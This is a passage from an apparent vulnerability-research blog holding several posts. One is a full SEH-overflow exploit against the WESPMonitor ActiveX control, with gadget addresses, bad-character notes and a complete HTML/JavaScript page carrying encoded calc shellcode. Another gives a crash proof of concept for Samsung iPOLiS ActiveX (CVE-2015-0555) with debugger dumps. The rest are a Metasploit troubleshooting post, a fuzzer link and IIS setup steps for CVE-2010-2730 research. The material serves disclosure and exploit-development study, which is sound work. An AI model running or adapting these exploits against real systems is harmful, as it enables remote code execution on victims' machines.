<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x1007973e </b>: pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x1001a561 </b>: pop ebp # mov byte ptr ds:[edx+c],1 # mov al,1 # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x10014771 </b>: pop ebx # pop ebp # retn | ascii {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x7c915242 </b>: pop edi # pop esi # pop ebx # pop ebp # retn | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\<b>ntdll.dll</b>)</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I was trying to pick calc.exe shellcode from previous exploits which somehow didn't work, might be due to presence of bad characters (assuming) so ended up in generating payload using Metasploit.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWo7i5c160P0F3t0nB2v6Ans3Kh54PjUCs6LWLD5hYjKUKvFdH6xtAifMqE6PJgx_ATDFtKu-ugDB2XOlHJT7mqPPUqkd8rd94kvQLUHUPBE1JzovGImpYdmZv4Q7LO8lBK79ZTZXV64wW/s1600/shellcode_generation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWo7i5c160P0F3t0nB2v6Ans3Kh54PjUCs6LWLD5hYjKUKvFdH6xtAifMqE6PJgx_ATDFtKu-ugDB2XOlHJT7mqPPUqkd8rd94kvQLUHUPBE1JzovGImpYdmZv4Q7LO8lBK79ZTZXV64wW/s1600/shellcode_generation.png" height="400" width="320" /></a></div>
<br />
To Make sure we are pointing to shellcode modify <span class="pln" style="font-size: 13.5240001678467px; line-height: 20.2859992980957px;">nseh </span><span class="pun" style="color: #666600; font-size: 13.5240001678467px; line-height: 20.2859992980957px;">=</span><span class="pln" style="font-size: 13.5240001678467px; line-height: 20.2859992980957px;"> </span><span class="str" style="color: #008800; font-size: 13.5240001678467px; line-height: 20.2859992980957px;">"\xeb\x10\x90\x90"</span><br />
<span class="pln" style="font-size: 13.5240001678467px; line-height: 20.2859992980957px;"><span style="color: #666600;">to </span>nseh </span><span class="pun" style="color: #666600; font-size: 13.5240001678467px; line-height: 20.2859992980957px;">=</span><span class="pln" style="font-size: 13.5240001678467px; line-height: 20.2859992980957px;"> </span><span class="str" style="color: #008800; font-size: 13.5240001678467px; line-height: 20.2859992980957px;">"\xcc\xcc\xeb\x10"</span><span class="pun" style="color: #666600; font-size: 13.5240001678467px; line-height: 20.2859992980957px;">;</span><br />
where \xcc is an opcode which acts as breakpoint.<br />
<br />
Following "pop pop ret" address always getting modified to a different address and seeing below error in WinDBG.<br />
<span style="font-family: 'Courier New', Courier, monospace;">0013df5c: WESPMonitor!CxImage::`copy constructor closure'+13d20 (10073f40)</span><br />
<br />
0x10079740 changes to 0x10073f40<br />
0x100580bd changes to 0x10053fbd<br />
0x1007973e changes to 0x10073f3e<br />
0x7c915242 changes to 0x7c3f5242 in ntdll<br />
<br />
After few trial and error method found below address which doesn't have problem mentioned above might be due to the bad character issue where application is considering \x80 to \x9f as bad!<br />
0x1001a561<br />
0x10014771<br />
Bad characters might cause issues while executing shellcode, those characters can be found using below technique.<br />
<a href="http://blog.disects.com/2014/04/exploitation-identifying-bad-characters.html">http://blog.disects.com/2014/04/exploitation-identifying-bad-characters.html</a><br />
<br />
<span style="color: #cc0000;">>u 10079740 </span><br />
10079740 5e pop esi<br />
10079741 32c0 xor al,al<br />
10079743 5b pop ebx<br />
10079744 c3 ret<br />
<br />
Final Exploit<br />
<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
<br />
<pre class="prettyprint"><html>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid = "WESPMONITORLib.WESPMonitorCtrl"
argCount = 1
-->
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
</object>
<script>
var arg1 = "";
nops = "";
var buff = "";
for(i=0;i<268;i++)
{
<span class="Apple-tab-span" style="white-space: pre;"> </span>arg1 += "B";
}
nseh = "\xeb\x10\x90\x90";<span class="Apple-tab-span" style="white-space: pre;"> </span>//jmp over addr
seh = "\x71\x47\x01\x10";<span class="Apple-tab-span" style="white-space: pre;"> </span>//pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
for(i=0;i<200;i++)
{
<span class="Apple-tab-span" style="white-space: pre;"> </span>nops += "\x90";
}
//bad cahrs = 80,82-89, 8a 8b 8c, 8e, 91-99, 9a 9b 9c 9e 9f
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
{
<span class="Apple-tab-span" style="white-space: pre;"> </span>buff += "A";
}
//<span class="Apple-tab-span" style="white-space: pre;"> </span>[ Junk buffer ][ next SEH ][ SE Handler ][ Shellcode ]
fbuff = arg1 + nseh + seh + nops + sc + buff;
target.LoadImage(fbuff);
</script>
</html>
</pre>
<div>
<br /></div>
Below is the stack trace at first point exception<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(33c.6d8): Access violation - code c0000005 (first chance)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">First chance exceptions are reported before any exception handling.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">This exception may be expected and handled.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">eax=00000f41 ebx=001b012c ecx=020fe0b1 edx=02100000 esi=020fd218 edi=00001f42</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">eip=1004ae5b esp=020fd218 ebp=020ff280 iopl=0 nv up ei pl nz na pe nc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*** WARNING: Unable to verify checksum for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll - </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WESPMonitor!DllUnregisterServer+0x2094b:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1004ae5b 8802 mov byte ptr [edx],al ds:0023:02100000=4d</span><br />
<span style="color: #cc0000;">0:008> !exchain</span><br />
020ff274: WESPMonitor!CAudioRenderer::CloseAudio+11a61 (<b><span style="color: #c27ba0;">10014771</span></b>)<br />
Invalid exception stack at 909010eb<br />
<span style="color: #cc0000;">0:008> d fs:[0]</span><br />
003b:00000000 <b><span style="color: #073763;">74 f2 0f 02</span></b> 00 00 10 02-00 00 0f 02 00 00 00 00 t...............<br />
003b:00000010 00 1e 00 00 00 00 00 00-00 50 fd 7f 00 00 00 00 .........P......<br />
003b:00000020 3c 03 00 00 d8 06 00 00-00 00 00 00 00 00 00 00 <...............<br />
003b:00000030 00 e0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000040 70 98 8e e1 00 00 00 00-00 00 00 00 00 00 00 00 p...............<br />
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
<span style="color: #cc0000;">0:008> u 10014771</span><br />
WESPMonitor!CAudioRenderer::CloseAudio+0x11a61:<br />
<b><span style="color: #c27ba0;">10014771</span></b> 5b pop ebx<br />
10014772 5d pop ebp<br />
10014773 c3 ret<br />
<span style="color: #cc0000;">0:008> d 020ff274</span><br />
<span style="color: #0c343d;"><b>020ff274</b> </span> eb 10 90 90 <b><span style="color: #c27ba0;">71 47 01 10</span></b>-90 90 90 90 90 90 90 90 ....qG..........<br />
020ff284 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff294 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2a4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2b4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2c4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2d4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020ff2e4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
<br />
If you continue execution after first chance exception we will be greeted with a calculator :-)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZLH260gcxkqDSk9nzrmH4orB21AZsxzLCYV6sv8O8iJnECwakKpt1TfX2947F7SmUZPWmv8UJd6fsGlvzHsdP2PRLkRjpWhFcRzWKEmZn-lso7NoQZffCUONJURV3Dddg54OYgTXeI23Q/s1600/shellcode_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZLH260gcxkqDSk9nzrmH4orB21AZsxzLCYV6sv8O8iJnECwakKpt1TfX2947F7SmUZPWmv8UJd6fsGlvzHsdP2PRLkRjpWhFcRzWKEmZn-lso7NoQZffCUONJURV3Dddg54OYgTXeI23Q/s1600/shellcode_calc.png" height="192" width="400" /></a></div>
<br />
This exploit is tested on Windows XP SP3 with IE6, IE7 and IE8.<br />
This is tested and successfully executed when DEP is enabled.<br />
<br />
This post is incomplete if I don't thank Peter Van Eeckhoutte aka corelanc0d3r.<br />
<br />
Next, DEP bypass!!<br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-67002258123167022022015-03-25T00:24:00.000+05:302015-03-25T00:24:19.765+05:30Metasploit: Database not connected or cache not built, using slow searchWe can search metasploit modules using search command with various options but we frequently come accross error "Database not connected or cache not built, using slow search". Follow below steps to solve the issue.<br />
<br />
<span style="color: #cc0000;">msf > search cve:2015-0255</span> <br />
[!] Database not connected or cache not built, using slow search<br />
<br />
Postgresql service status when not running<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql status</span><br />
Running clusters:<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit status</span><br />
[FAIL] Metasploit rpc server is not running ... failed!<br />
[FAIL] Metasploit web server is not running ... failed!<br />
[FAIL] Metasploit worker is not running ... failed!<br />
<span style="color: #cc0000;"><br /></span>
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit start </span> <br />
[FAIL] Postgresql must be started before Metasploit ... failed!<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql start </span> <br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service postgresql status </span> Running clusters: 9.1/main<br />
<br />
<span style="color: #cc0000;">root@kali-praveend:/# service metasploit start</span><br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<span style="color: #cc0000;">msf > db_status </span> <br />
[*] postgresql connected to msf3<br />
<br />
<span style="color: #cc0000;">msf > db_rebuild_cache </span> <br />
[*] Purging and rebuilding the module cache in the background...<br />
msf ><br />
<br />
Now we should not see the error.Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-45453497694720810872015-03-06T23:55:00.000+05:302015-03-10T21:28:48.902+05:30Web Server/HTTP FuzzerWas searching for basic HTTP/Web Server Fuzzer but could not find one.<br />
So ended by writing this quick dirty Fuzzer.<br />
<br />
<b>Features</b><br />
<br />
Supports 40 different Request Methods<br />
Supports around 40 Request Headers<br />
Can send invalid request methods and headers<br />
Fuzz Methods and Headers<br />
Fuzz Headers with XSS String(s), blank strings, huge buffer<br />
<br />
<a href="https://github.com/praveendhac/VulnerabilityResearch/blob/master/WebServer_Fuzzer.py">https://github.com/praveendhac/VulnerabilityResearch/blob/master/WebServer_Fuzzer.py</a><br />
<br />
Please drop comments if you want me to add new feature(s).Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-36890894218295865172015-02-28T01:35:00.002+05:302015-03-26T00:07:27.264+05:30Samsung iPOLiS 1.12.2 XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC<b>Author:</b> Praveen Darshanam<br />
<b>CVE:</b> 2015-0555<br />
<b>Vulnerable File:</b> "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"<br />
<b>prototype:</b> "Function ReadConfigValue ( ByVal szKey As String ) As String"<br />
<b>memberName:</b> "ReadConfigValue"<br />
<b>progid/ActiveX:</b> "XNSSDKDEVICELib.XnsSdkDevice"<br />
<b>Operating System:</b> Windows 7 Ultimate N SP1<br />
<b>Vulnerable Software:</b> Samsung iPOLiS 1.12.2<br />
<br />
<b>Proof of Concept</b><br />
<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
<pre class="prettyprint">
<html>
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var argCount = 1;
var arg1= "";
for (i=0; i<= 4000; i++)
{
arg1 += "A";
}
target.ReadConfigValue(arg1);
</script>
</html>
</code></pre>
<b>Stack Trace</b><br />
Exception Code: ACCESS_VIOLATION<br />
Disasm: 6492CE<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV AL,[EDI+EDX]<br />
<br />
Seh Chain:<br />
--------------------------------------------------<br />
1 <span class="Apple-tab-span" style="white-space: pre;"> </span>41414141<br />
<br />
Called From Returns To<br />
--------------------------------------------------<br />
XNSSDKDEVICE.6492CE 41414141<br />
41414141 8ABAB41<br />
8ABAB41 mfc100.64BA90C1<br />
mfc100.64BA90C1 3D39D016<br />
FFFFFFFE mfc100.64AFBE5C<br />
<br />
Registers:<br />
--------------------------------------------------<br />
EIP 006492CE<br />
EAX 00000408<br />
EBX 01AD9FB0 -> 0065A564<br />
ECX 00000414<br />
EDX 08ABAB41<br />
EDI 0000009C<br />
ESI 0000009C<br />
EBP 002DEA9C -> Asc: AAAAAAAAA<br />
ESP 002DE7F4 -> 59D56B19 -> Asc: k k<br />
<br />
Block Disassembly:<br />
--------------------------------------------------<br />
6492BD<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV ECX,EAX<br />
6492BF<span class="Apple-tab-span" style="white-space: pre;"> </span>XOR ESI,ESI<br />
6492C1<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV [EBP-298],ECX<br />
6492C7<span class="Apple-tab-span" style="white-space: pre;"> </span>TEST ECX,ECX<br />
6492C9<span class="Apple-tab-span" style="white-space: pre;"> </span>JLE SHORT 00649340<br />
6492CB<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EDX,[EBP+8]<br />
6492CE<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV AL,[EDI+EDX]<span class="Apple-tab-span" style="white-space: pre;"> </span> <--- crash="" p="">6492D1<span class="Apple-tab-span" style="white-space: pre;"> </span>CMP AL,2F<br />
6492D3<span class="Apple-tab-span" style="white-space: pre;"> </span>JNZ SHORT 00649333<br />
6492D5<span class="Apple-tab-span" style="white-space: pre;"> </span>TEST EDI,EDI<br />
6492D7<span class="Apple-tab-span" style="white-space: pre;"> </span>JNZ SHORT 00649304<br />
6492D9<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH 80<br />
6492DE<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA EAX,[EBP-90]<br />
6492E4<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EDI<br />
6492E5<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EAX<br />
<br />
ArgDump:<br />
--------------------------------------------------<br />
EBP+8<span class="Apple-tab-span" style="white-space: pre;"> </span>08ABAB41<br />
EBP+12<span class="Apple-tab-span" style="white-space: pre;"> </span>64BA90C1 -> EBE84589<br />
EBP+16<span class="Apple-tab-span" style="white-space: pre;"> </span>3D39D016<br />
EBP+20<span class="Apple-tab-span" style="white-space: pre;"> </span>FFFFFFFE<br />
EBP+24<span class="Apple-tab-span" style="white-space: pre;"> </span>64AFBE5C -> CCCCCCC3<br />
EBP+28<span class="Apple-tab-span" style="white-space: pre;"> </span>00000018<br />
<br />
Stack Dump:<br />
--------------------------------------------------<br />
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00 [.k.Y..........d.]<br />
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00 [....de.d........]<br />
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]<br />
<br />
Exception Code: ACCESS_VIOLATION<br />
Disasm: 41414141<span class="Apple-tab-span" style="white-space: pre;"> </span>?????<br />
<br />
Seh Chain:<br />
--------------------------------------------------<br />
1 <span class="Apple-tab-span" style="white-space: pre;"> </span>41414141<br />
<br />
Called From Returns To<br />
--------------------------------------------------<br />
ntdll.77B670B4 ntdll.77BDAB1A<br />
ntdll.77BDAB1A ntdll.77BB0404<br />
ntdll.77BB0404 ntdll.77B3F956<br />
ntdll.77B3F956 ntdll.77B67017<br />
ntdll.77B67017 41414141<br />
41414141 8ABAB41<br />
8ABAB41 mfc100.64BA90C1<br />
mfc100.64BA90C1 3D39D016<br />
FFFFFFFE mfc100.64AFBE5C<br />
<br />
Registers:<br />
--------------------------------------------------<br />
EIP 77B670B4 -> C0000005<br />
EAX 002DE0EC -> C0000005<br />
EBX 41414141<br />
ECX 41414141<br />
EDX 00000000<br />
EDI 00000000<br />
ESI 002DE0EC -> C0000005<br />
EBP 002DE0D8 -> 002DE40C<br />
ESP 002DE088 -> 77B662A4<br />
<br />
<br />
Block Disassembly:<br />
--------------------------------------------------<br />
77B6709C<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV [ESP+8],EBX<br />
77B670A0<span class="Apple-tab-span" style="white-space: pre;"> </span>JMP 77B837AD<br />
77B670A5<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670AC<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670B0<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EDX,ESP<br />
77B670B2<span class="Apple-tab-span" style="white-space: pre;"> </span>SYSENTER<br />
77B670B4<span class="Apple-tab-span" style="white-space: pre;"> </span>RETN<span class="Apple-tab-span" style="white-space: pre;"> </span> <--- crash="" p="">77B670B5<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670BC<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA ESP,[ESP]<br />
77B670C0<span class="Apple-tab-span" style="white-space: pre;"> </span>LEA EDX,[ESP+8]<br />
77B670C4<span class="Apple-tab-span" style="white-space: pre;"> </span>INT 2E<br />
77B670C6<span class="Apple-tab-span" style="white-space: pre;"> </span>RETN<br />
77B670C7<span class="Apple-tab-span" style="white-space: pre;"> </span>NOP<br />
77B670C8<span class="Apple-tab-span" style="white-space: pre;"> </span>PUSH EBP<br />
77B670C9<span class="Apple-tab-span" style="white-space: pre;"> </span>MOV EBP,ESP<br />
<br />
<br />
ArgDump:<br />
--------------------------------------------------<br />
EBP+8<span class="Apple-tab-span" style="white-space: pre;"> </span>002DE0EC -> C0000005<br />
EBP+12<span class="Apple-tab-span" style="white-space: pre;"> </span>002DE13C -> 00000000<br />
EBP+16<span class="Apple-tab-span" style="white-space: pre;"> </span>00000000<br />
EBP+20<span class="Apple-tab-span" style="white-space: pre;"> </span>C0000005<br />
EBP+24<span class="Apple-tab-span" style="white-space: pre;"> </span>00000001<br />
EBP+28<span class="Apple-tab-span" style="white-space: pre;"> </span>00000000<br />
<br />
P.S. CERT tried to coordinate but there wasn't any response from Samsung<!-------><!-------><!-------><!-------><!-------><!-------><!-------><!-------><!-------><!-------></---></--->Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-3160153049125010392015-02-28T01:33:00.000+05:302015-03-02T23:15:05.151+05:30CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability Writing Proof of Concept based on information available on various sites.<br />
Checkpoint details the Vulnerability as<br />
<br />
<i>"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."</i><br />
<br />
<b>Configuring FastCGI for IIS 7.5</b><br />
Browse to<br />
<span style="font-family: Courier New, Courier, monospace;">Control Panel -> Programs and Features </span><br />
click "Turn Windows features on or off" and follow the path shown below.<br />
Note: I also tried enabling only CGI and un checking all the other checkboxes given below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ozahZfsphmmnoK23WrPWBJykIteopjWKODcJLtOnRf4ww4Z8-jkCZlBerAr-GHsSBo7s7k4t7csejpctrCPw-77WDC_9_ZUI9wCQPef7SdaS9K4A4KwvpzNaycP9gp09egams-fSt5A/s1600/enable_cgi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_ozahZfsphmmnoK23WrPWBJykIteopjWKODcJLtOnRf4ww4Z8-jkCZlBerAr-GHsSBo7s7k4t7csejpctrCPw-77WDC_9_ZUI9wCQPef7SdaS9K4A4KwvpzNaycP9gp09egams-fSt5A/s1600/enable_cgi.png" height="400" width="310" /></a></div>
<br />
<br />
Install Administrator pack for IIS 7.5 after installing the pack click on start and type IIS you will see Internet Information Services (IIS Manager), clicking on it will take you to below window.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28w-VPJjqC0e672rQz4CN0S9yw4ADEMK2TLkS8cL0jww7ozIHC8dp8jITKpldmlVcGz8tHTOAqk5UBe-jMmZC_NDUV7Mjd6Josc0FyRWwmcxwaG_-ELU5d63B0iUyEpSYP-UdHh-adNAb/s1600/AdministrationPackforIIS7_RemoteAdministration.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28w-VPJjqC0e672rQz4CN0S9yw4ADEMK2TLkS8cL0jww7ozIHC8dp8jITKpldmlVcGz8tHTOAqk5UBe-jMmZC_NDUV7Mjd6Josc0FyRWwmcxwaG_-ELU5d63B0iUyEpSYP-UdHh-adNAb/s1600/AdministrationPackforIIS7_RemoteAdministration.png" height="332" width="400" /></a></div>
<br />
Configure FastCGI as shown below<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ek2uomGYlaLlhhmvxTuWwET9AjX1idjBotUzoUPvlN7O4GYIW2pDc2NYiZrN5wCUpDNvqVOxm2-kxltLj1r0vuPXoQQA92S93rwkSdLaZLwkJHiWLkzV6S6LG6Qc9IRg0zwLkSFnhj7X/s1600/IISManager_FastCGI_ApplicationCreation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ek2uomGYlaLlhhmvxTuWwET9AjX1idjBotUzoUPvlN7O4GYIW2pDc2NYiZrN5wCUpDNvqVOxm2-kxltLj1r0vuPXoQQA92S93rwkSdLaZLwkJHiWLkzV6S6LG6Qc9IRg0zwLkSFnhj7X/s1600/IISManager_FastCGI_ApplicationCreation.png" height="313" width="400" /></a></div>
<br />
If you feel configuration didn'g go fine you can configure and verify the same using CLI.<br />
<span style="font-family: Courier New, Courier, monospace;">appcmd.exe </span>is found at<br />
<span style="font-family: Courier New, Courier, monospace;">%windir%\system32\inetsrv\</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie7eQJy7T8EEASC-3YbBhiHgen8n0Zeff4VOKgIiVKAH18dl9N3UQIpDMu8p20BuNqh1qb49tLTR48WLVTtXVKq80YJtIYdzeAZpg0V97CW__PMVwxWxW0f87CmdCJTzN0u-5pGyORjWwi/s1600/iis_appcmd_fastcgi_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie7eQJy7T8EEASC-3YbBhiHgen8n0Zeff4VOKgIiVKAH18dl9N3UQIpDMu8p20BuNqh1qb49tLTR48WLVTtXVKq80YJtIYdzeAZpg0V97CW__PMVwxWxW0f87CmdCJTzN0u-5pGyORjWwi/s1600/iis_appcmd_fastcgi_config.png" height="117" width="400" /></a></div>
<br />
